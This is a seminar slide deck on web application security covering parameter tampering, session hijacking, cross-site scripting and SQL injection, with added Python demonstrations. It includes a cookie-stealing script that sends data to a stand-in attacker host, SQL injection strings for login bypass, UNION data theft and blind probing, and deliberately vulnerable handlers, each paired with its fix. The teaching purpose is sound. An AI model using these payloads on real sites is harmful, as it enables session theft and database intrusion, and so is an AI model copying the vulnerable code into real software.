1 SDBI Seminar Web Application Security Name: Lior Ateret

2 Table of Contents
Introduction: Web applications, HTTP and HTML
Parameter Tampering: The most basic attack
Cross Site Scripting and Script Injection: Attacking the client
SQL Injection: Direct attack on the database
Solutions: How can we fix our application?

3 What is a Web Application? A software application, executed by a web server, which responds to dynamic web page requests over HTTP (from webappsec.org). The difference between a web application and an ordinary software application is the application's GUI: the browser renders it from HTML sent over HTTP.

4 The majority of security holes in web applications fall into just two categories: failure to deal with meta-characters (characters that have special meaning to the interpreter the input reaches, such as HTML or SQL), and authorization problems caused by placing too much trust in input.

5 The Source of the Vulnerabilities. Applications assume that the client behaves in an expected manner: programmers only anticipate the user-controlled input in the designated fields. But the client is controlled by the user, and the data it sends can be manipulated with various tools (or with no tools at all).

6 The Server Defense Rings (diagram). Each ring stops one class of attack before it reaches the web server:
Eavesdropping Attacks: SSL
Network Attacks: Firewall
Known Viruses: Anti-Virus
New or Unknown Viruses: Server Hardening
Web Application Attacks: no ring in the diagram; this malicious activity arrives at the Web Server itself.

7 Introduction
The Problem: There is no magic solution. Application attacks are more dangerous: the vulnerability is usually easy to exploit and usually hard to fix.
The Solution: The only solution is to educate the developers. The developers need to know how to look for vulnerabilities and how to fix them correctly.

8 HTTP Intro

9 The HTTP Protocol. HTTP is plain text and human readable. HTTP is stateless: each request stands alone. Two versions are in common use, 1.0 and 1.1. The HTTP request flow: 1. An HTTP request is sent to the server. 2. An HTTP response is sent back to the client, carrying the HTML.

10 HTTP Request. The request has three sections: the request line (method, URL and version), the headers, and the content (body). It is possible to send parameters to the server. There are several types (methods) of HTTP request; the type is set in the first line. In a GET request the parameters are sent in the URL; in a POST request they are in the content.

11 HTTP GET request
GET /search?search=sdbi%20seminar HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8)
Accept: text/xml,application/xml,text/html;
Accept-Language: en-us,en;q=0.7,he;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

12 HTTP POST request (the parameter moves from the URL into the body; Content-Length is the byte count of that body, 21 here, and Content-Type tells the server how to decode it)
POST /search HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8)
Accept: text/xml,application/xml,text/html;
Accept-Language: en-us,en;q=0.7,he;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

search=sdbi%20seminar
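The three sections described above, parsed in working code. This is an added example, not part of the original slides: it takes the GET and POST requests from the two previous slides (reconstructed here as constructed strings, with the POST trimmed to the headers the parser needs), splits them into request line, headers and body, and collects the parameters from wherever the method puts them. It also honours Content-Length, since the body of a keep-alive connection ends exactly there.

```python
from urllib.parse import parse_qs

# Constructed requests modelled on the GET and POST slides above; the
# Content-Length matches the 21-byte body "search=sdbi%20seminar".
GET_REQUEST = (
    "GET /search?search=sdbi%20seminar HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
POST_REQUEST = (
    "POST /search HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 21\r\n"
    "\r\n"
    "search=sdbi%20seminar"
)


def parse_request(raw: str) -> dict:
    """Split one HTTP/1.x request into request line, headers and body.

    Parameters are collected from the URL query (GET) and, for a
    form-encoded POST, from the body as well.  Only ASCII requests are
    handled here, so byte and character counts coincide.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    # The body is exactly Content-Length bytes; anything after that belongs
    # to the next request on a keep-alive connection, not to this one.
    length = int(headers.get("content-length", "0"))
    body = body[:length]

    path, _, query = target.partition("?")
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

    is_form_post = method == "POST" and headers.get("content-type", "").startswith(
        "application/x-www-form-urlencoded"
    )
    if is_form_post:
        # A name present in both the query and the body is resolved here in
        # favour of the body.  Frameworks differ on this, so the server must
        # decide deliberately rather than trust whichever copy it happens to see.
        for k, v in parse_qs(body, keep_blank_values=True).items():
            params[k] = v[0]

    return {
        "method": method,
        "path": path,
        "version": version,
        "headers": headers,
        "params": params,
        "body": body,
    }


if __name__ == "__main__":
    for raw in (GET_REQUEST, POST_REQUEST):
        req = parse_request(raw)
        print(req["method"], req["path"], req["params"])
```

Both requests yield the same parameter, search=sdbi seminar, which is the point of the next sections: the server cannot tell from the parameter alone whether it came from a form the user filled in or from a request the user edited by hand.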

13 HTTP Response. Almost the same layout as the HTTP request. The server sets the status of the request in the first line of the response: 200 is OK, 404 is Not Found.

14 HTTP Response
HTTP/1.1 200 OK
Server: GWS/2.1
Cache-Control: private
Content-Type: text/html
Date: Sat, 28 Jan 2006 02:51:53 GMT
...

15 HTML Intro

16 HyperText Markup Language. A format that combines text with extra information about the text. The "extra information" is stored inside HTML tags that surround the text.

17 The FORM tag. The FORM tag is used to send parameters to a web server. It sets where the parameters are sent (the action) and how they are sent (GET or POST). Inside the FORM tag there are usually more tags that request the parameters from the user: the INPUT tag for text fields and buttons, the SELECT tag for a combo box.

18 (Example form from the slide: a text INPUT for "Student name" and a SELECT combo box for "Hair color" with the options blue, green and red.)


20 Parameter Tampering

21 The simplest form of application-level attack. It requires almost no hacking skill and can be done without any tools. The attack takes advantage of a basic fact: programmers relay parameters through the client.

22 Programmers transfer data to and from the client, seemingly without letting the user change it. But an attacker controls the client and can change any data saved on the client side to a value the application did not anticipate. Such parameters include hidden fields, combo boxes, parameters within links, etc.

23 Where Can We Find It? In almost any page that receives parameters. Parameter Tampering is any form of altering parameter values in HTTP requests. It can be done both on URL parameters and in the body of POST requests.

24 The most common locations
Forms: Hidden Field Manipulation; User Selection Manipulation
Links: Parameters that are sent in GET requests

25 Forms Parameter Tampering: Hidden Field Manipulation. Hidden fields are sometimes used to store server data (instead of using the session). But a "hidden" field is not that hidden: it is in the HTML the client received, and it can be altered before the form is submitted.

26 Hidden Field Manipulation

27 Forms Parameter Tampering: User Selection Manipulation. Users are presented with a combo box or radio buttons to choose between several options. Usually no additional checks are performed on the server for input that "could only" come from those options. But the user can change the submitted value to anything he chooses.

28 Parameter Tampering - Example: a Loan Request form. "Please Enter Your Loan Information:" Loan Sum: (text INPUT). The Number of Payments: (SELECT combo box with the options 3, 6, 12, 24).

29 User Selection Manipulation
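The loan example above, carried through on the server side. This is an added example, not code from the original slides: the field names "sum" and "payments", the MAX_LOAN_SUM limit and the request bodies are assumptions constructed for it. The naive handler trusts the combo box to have restricted the value; the validating handler re-checks every parameter against what the server itself offered, which is the only check an attacker cannot edit.

```python
from urllib.parse import parse_qs

# Server-side knowledge of the form: the Loan Request slide offers exactly
# these payment counts in its combo box.  The field names "sum" and
# "payments" and the MAX_LOAN_SUM limit are assumptions for this example.
ALLOWED_PAYMENTS = (3, 6, 12, 24)
MAX_LOAN_SUM = 100_000

# Constructed request bodies.  What the browser sends when the user picks 12 payments ...
HONEST_BODY = "sum=1200&payments=12"
# ... the same request after the attacker changed the combo-box value (or
# rewrote the POST body in transit) to an option that was never offered ...
TAMPERED_BODY = "sum=1200&payments=1200"
# ... and a value the text field was never meant to carry.
NEGATIVE_BODY = "sum=-1200&payments=12"


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into name -> value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def naive_handler(body: str) -> dict:
    """Trusts the client: the combo box 'can only' hold 3, 6, 12 or 24,
    so the value is used without any further check."""
    form = form_fields(body)
    loan_sum = int(form["sum"])
    payments = int(form["payments"])
    return {"sum": loan_sum, "payments": payments,
            "per_payment": round(loan_sum / payments, 2)}


def validating_handler(body: str) -> dict:
    """Re-validates every parameter against what the server itself offered."""
    form = form_fields(body)
    try:
        loan_sum = int(form.get("sum", ""))
        payments = int(form.get("payments", ""))
    except ValueError:
        raise ValueError("loan parameters must be integers")
    if not 0 < loan_sum <= MAX_LOAN_SUM:
        raise ValueError("loan sum out of range")
    if payments not in ALLOWED_PAYMENTS:
        raise ValueError("number of payments is not one of the offered options")
    return {"sum": loan_sum, "payments": payments,
            "per_payment": round(loan_sum / payments, 2)}


if __name__ == "__main__":
    print("naive, honest:   ", naive_handler(HONEST_BODY))
    print("naive, tampered: ", naive_handler(TAMPERED_BODY))   # 1200 payments of 1.00
    print("naive, negative: ", naive_handler(NEGATIVE_BODY))   # a loan that pays the borrower
    for body in (TAMPERED_BODY, NEGATIVE_BODY):
        try:
            validating_handler(body)
        except ValueError as err:
            print("validating rejected:", err)
```

The allowed list lives on the server, so the check works whether the value arrived from the real combo box, from an edited copy of the page, or from a hand-crafted POST body.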


31 HTTP Sessions. Since HTTP is stateless, there is a need to keep track of a single user's work across otherwise unrelated HTTP requests. Many times the user's authentication is also saved in the session.

32 The Lifecycle of a Session. After the user logs on or connects, a session object is created on the server. A unique session identifier is generated for that session and sent back to the user. The user's browser then sends this session ID with each request, allowing the application to associate the request with the session. The application can store any user-specific information in the session object's memory. When logging off, or after a timeout, the session object is destroyed.

33 HTTP Sessions. The session identifier is usually stored in a cookie. It is a very large string that should be very hard to guess, but it is not always that strong (Zvi Gutterman has shown session identifiers that could be guessed).

34 Session Hijacking is an attack in which the attacker takes control of a user's session after obtaining a valid session identifier. Through this attack the attacker gains access to the system as if he were the authenticated user, without ever knowing that user's credentials.

35 Hacker’s request was rejected due to lack of a valid cookie Session Hijacking

36 Hacker’s request was accepted as it contained a valid cookie Session Hijacking
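The two screenshots above, reduced to code. This is an added example, not part of the original slides: a minimal server-side session store with a protected page, where the cookie name SESSIONID is an assumption. The attacker's first request carries no cookie and is rejected; the second carries the victim's stolen identifier and is served as the victim. The HttpOnly and Secure cookie attributes in set_cookie_header are an addition beyond the slides.

```python
import secrets
from http.cookies import SimpleCookie
from typing import Optional

COOKIE_NAME = "SESSIONID"  # assumed cookie name for this example


class SessionStore:
    """Server-side session table: the browser holds only the identifier."""

    def __init__(self) -> None:
        self._sessions: dict = {}

    def create(self, username: str) -> str:
        # 32 bytes from the OS CSPRNG (~256 bits): far too large to guess or enumerate.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username}
        return sid

    def destroy(self, sid: str) -> None:
        # Log-off or timeout: the identifier stops working immediately.
        self._sessions.pop(sid, None)

    def lookup(self, cookie_header: Optional[str]) -> Optional[dict]:
        """Resolve the Cookie header of a request to a session, or None."""
        if not cookie_header:
            return None
        jar = SimpleCookie()
        jar.load(cookie_header)
        morsel = jar.get(COOKIE_NAME)
        if morsel is None:
            return None
        return self._sessions.get(morsel.value)


def set_cookie_header(sid: str) -> str:
    """Set-Cookie line sent after log-on.  HttpOnly (an addition beyond the
    slides) keeps the value out of document.cookie, so a script injected into
    the page cannot read it; Secure keeps it off plain HTTP."""
    return f"Set-Cookie: {COOKIE_NAME}={sid}; Path=/; HttpOnly; Secure"


def handle_request(store: SessionStore, cookie_header: Optional[str]) -> tuple:
    """A protected page: identity comes from the session and nothing else."""
    session = store.lookup(cookie_header)
    if session is None:
        return 401, "no valid session"
    return 200, f"hello {session['user']}"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")                                # victim logs on
    print(set_cookie_header(sid))
    print(handle_request(store, None))                         # attacker, no cookie: rejected
    print(handle_request(store, f"{COOKIE_NAME}={sid}"))       # attacker with stolen cookie: served as alice
```

Nothing in handle_request can tell the two bearers of the same cookie apart, which is exactly why the next slides concentrate on how the identifier gets stolen.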

37 Client Side Attacks. Instead of attacking the server we can attack a client. Web browsers allow web servers to send them scripts, which the browser runs inside the HTML page.

38 One way of stealing session identifiers is to send the client a script that reads the cookie and sends it to the attacker. The script can access the document.cookie object, which contains the cookie information. Browser security, however, limits a script's access to the web site it came from (the same-origin policy), so a script served from the attacker's site cannot read the victim site's cookie.

39 Cross Site Scripting (XSS). A way to perform script-based attacks without being limited by browser security. The attack takes advantage of the principle that a remote server can send scripts to the client: if the vulnerable site echoes the attacker's script back to the victim, the browser runs it in that site's security context. The client is part of the attack process, as the script itself is not permanently stored on the remote system.

40 Cross Site Scripting

41 Cross Site Scripting (XSS). Almost every application is, or has been, vulnerable to XSS at some point in its life. Many major sites, such as Google, Yahoo, eBay, the FBI, CNN, Microsoft and Apple, were vulnerable to XSS at some point. Every month dozens of XSS vulnerabilities are discovered in commercial products.

42 Cross Site Scripting (XSS). The script, sent by the attacked client to the server, was received again by the client, now with the proper security context of the attacked site, and was therefore able to read the cookie and send it to the attacker.

43 Cross Site Scripting

44 Script Injection. The attacker takes advantage of a component in the system that displays to users information previously entered by other users. With no limitation on the attacker's input, the attacker can insert HTML and scripts into it, and the site stores and serves them to every later visitor.

45 Scripts Injection

46 The script, now served from the web site's own domain, was able to access sensitive information and send it to the attacker.

47 Script Injection: potentially vulnerable components
Message Boards (Forums): allow users to contribute data that is viewed in every reader's browser.
User Comments: product reviews, guest books, etc. all accept and display input.
Contact Forms: online support, "Contact Us" forms, etc. The input will be reviewed by an operator, likely with higher permissions.
Online Messaging, such as Web Mail systems.

48 Scripts Injection

49 Script Attacks Summary. While all the demonstrated examples focused on cookie theft, script attacks can be used for other purposes as well:
Actual data theft
Execution of operations within the victim's session
Execution of various client-side scripts in a restricted environment
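The reflected (XSS) and stored (script injection) cases from the preceding slides, with the fix the Solutions slide calls for: encode user input before displaying it. This is an added example, not code from the original slides; the cookie-stealing payload is constructed to match the attack the slides describe, attacker.example is a hypothetical host, and the search page and message board are assumed minimal versions of the components listed on the previous slide.

```python
import html
from urllib.parse import parse_qs, quote

# Constructed payload of the kind the slides describe: a script that reads
# document.cookie and ships it to the attacker.  attacker.example is a
# hypothetical host.
PAYLOAD = ("<script>new Image().src="
           "'http://attacker.example/steal?c='+document.cookie</script>")
# The same payload as it travels in a GET query string (reflected XSS).
ATTACK_QUERY = "search=" + quote(PAYLOAD)


def search_page(query_string: str, escape_output: bool) -> str:
    """Reflected case: a parameter of the current request is echoed back.
    With escape_output=False this is the XSS bug; with True it is the fix."""
    term = parse_qs(query_string).get("search", [""])[0]
    shown = html.escape(term, quote=True) if escape_output else term
    return f"<p>Results for: {shown}</p>"


class MessageBoard:
    """Stored case (script injection): one user's post is rendered to every reader."""

    def __init__(self) -> None:
        self.posts = []

    def post(self, author: str, text: str) -> None:
        # Stored exactly as typed; the encoding belongs at output time, where
        # the HTML context the text lands in is known.
        self.posts.append((author, text))

    def render(self, escape_output: bool) -> str:
        lines = []
        for author, text in self.posts:
            if escape_output:
                author, text = html.escape(author), html.escape(text)
            lines.append(f"<div><b>{author}</b>: {text}</div>")
        return "\n".join(lines)


def is_script_injected(rendered_html: str) -> bool:
    """Crude check used only to show the difference: does a live <script> tag survive?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print(search_page(ATTACK_QUERY, escape_output=False))  # script runs in the victim's browser
    print(search_page(ATTACK_QUERY, escape_output=True))   # same text, shown as text
    board = MessageBoard()
    board.post("mallory", PAYLOAD)
    board.post("bob", "Nice seminar!")
    print(board.render(escape_output=True))
```

html.escape turns < > & " ' into entities, which neutralises a payload placed in HTML text or inside a quoted attribute value. Output placed inside a script block, a URL or a style needs that context's own encoding; escaping for the wrong context is a common way the fix fails.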


51 SQL Injection. SQL Injection is an attack in which the attacker alters the syntax of the SQL statements the application sends to the database server. Using SQL Injection the attacker may be able to access sensitive data, bypass access controls or authentication, take over the server, or cause a Denial of Service.

52 SQL Injection: Why Are We Vulnerable? SQL Injection is the result of a simplistic database access mechanism that relies on string-built queries. The programmer concatenates SQL syntax and parameters into a single string that is sent to the database. The attacker is therefore able to inject SQL syntax into a parameter, and it becomes part of the query.

53 SQL Injection: What can we do with it? Bypass authentication if SQL is used to check the login screen. Steal data from the database using the UNION SQL operator to append our own SELECT to the application's query. On some database servers, even execute commands on the server itself.

54 SQL Injection is still dangerous even if the query's output is never displayed on the page. Such "blind" injection can still be found easily, for example by observing whether an injected true or false condition changes the page, and exploited.
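The three capabilities claimed on the previous slides, run against a real (in-memory SQLite) database. This is an added example, not code from the original slides: the users and products tables, their rows and the payload strings are constructed for it. login_vulnerable and product_search_vulnerable build the query by string concatenation, as slide 52 describes; the _fixed versions pass the same input as bound parameters, so it can never become syntax. The two AND 1=1 / AND 1=2 probes show why the blind case from the last slide is still exploitable: the attacker sees no data, only whether rows came back.

```python
import sqlite3

# Constructed payloads.  A comment marker (-- in SQLite) swallows the rest
# of the application's query so the attacker's own syntax ends cleanly.
BYPASS_USERNAME = "' OR 1=1 -- "
UNION_PAYLOAD = "' UNION SELECT username, password FROM users -- "
BLIND_TRUE = "' AND 1=1 -- "
BLIND_FALSE = "' AND 1=2 -- "


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows.  Plaintext passwords are here only so the
    UNION result is readable; a real application stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES ('alice', 's3cret', 'admin');
        INSERT INTO users(username, password, role) VALUES ('bob', 'hunter2', 'user');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('Widget', 9.99), ('Gadget', 19.99);
    """)
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Parameters concatenated into the statement: the attacker controls syntax.
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_fixed(conn, username: str, password: str):
    # Bound parameters: the driver sends the values separately from the syntax.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def product_search_vulnerable(conn, name: str):
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{name}%'"
    return conn.execute(sql).fetchall()


def product_search_fixed(conn, name: str):
    # The wildcards are added to the bound value, never to the statement text.
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{name}%",)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("bypass:", login_vulnerable(conn, BYPASS_USERNAME, "anything"))   # ('alice', 'admin')
    print("fixed: ", login_fixed(conn, BYPASS_USERNAME, "anything"))        # None
    print("union: ", product_search_vulnerable(conn, UNION_PAYLOAD))        # user rows among products
    print("fixed: ", product_search_fixed(conn, UNION_PAYLOAD))             # []
    print("blind: ", len(product_search_vulnerable(conn, BLIND_TRUE)),
          len(product_search_vulnerable(conn, BLIND_FALSE)))                # 2 0
```

The fixed functions are not "escaping" anything: the statement text is constant and the values travel in a separate channel, so there is no string for the attacker's quote to close.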

55 SQL Injection


57 Solutions. As we already said, there is no magic solution. User input must always be checked on the server, against what the server itself offered, never only in the browser. When displaying user input, always encode it first, for the context (HTML text, attribute, script, URL) it is placed in. Use parameterized queries or stored procedures for your SQL; note that a stored procedure only helps if it takes its inputs as parameters and does not build SQL strings internally.

58 Questions?

59 Bibliography
Based on "Application Level Security Vulnerabilities" by Ofer Maor, www.hacktics.com
Microsoft's information security group for developers: http://www.microsoft.com/israel/events/default.aspx?event=securedev
WebAppSec, www.webappsec.org
Common Security Problems in the Code of Dynamic Web Applications: http://www.webappsec.org/projects/articles/062105.shtml
WebAppSec glossary: http://www.webappsec.org/projects/glossary/

60 Useful Links
Web Application Security: www.webappsec.org, www.owasp.org
Hacking "Games": www.hackthissite.org/, www.owasp.org/software/webgoat.html, hackquest.com

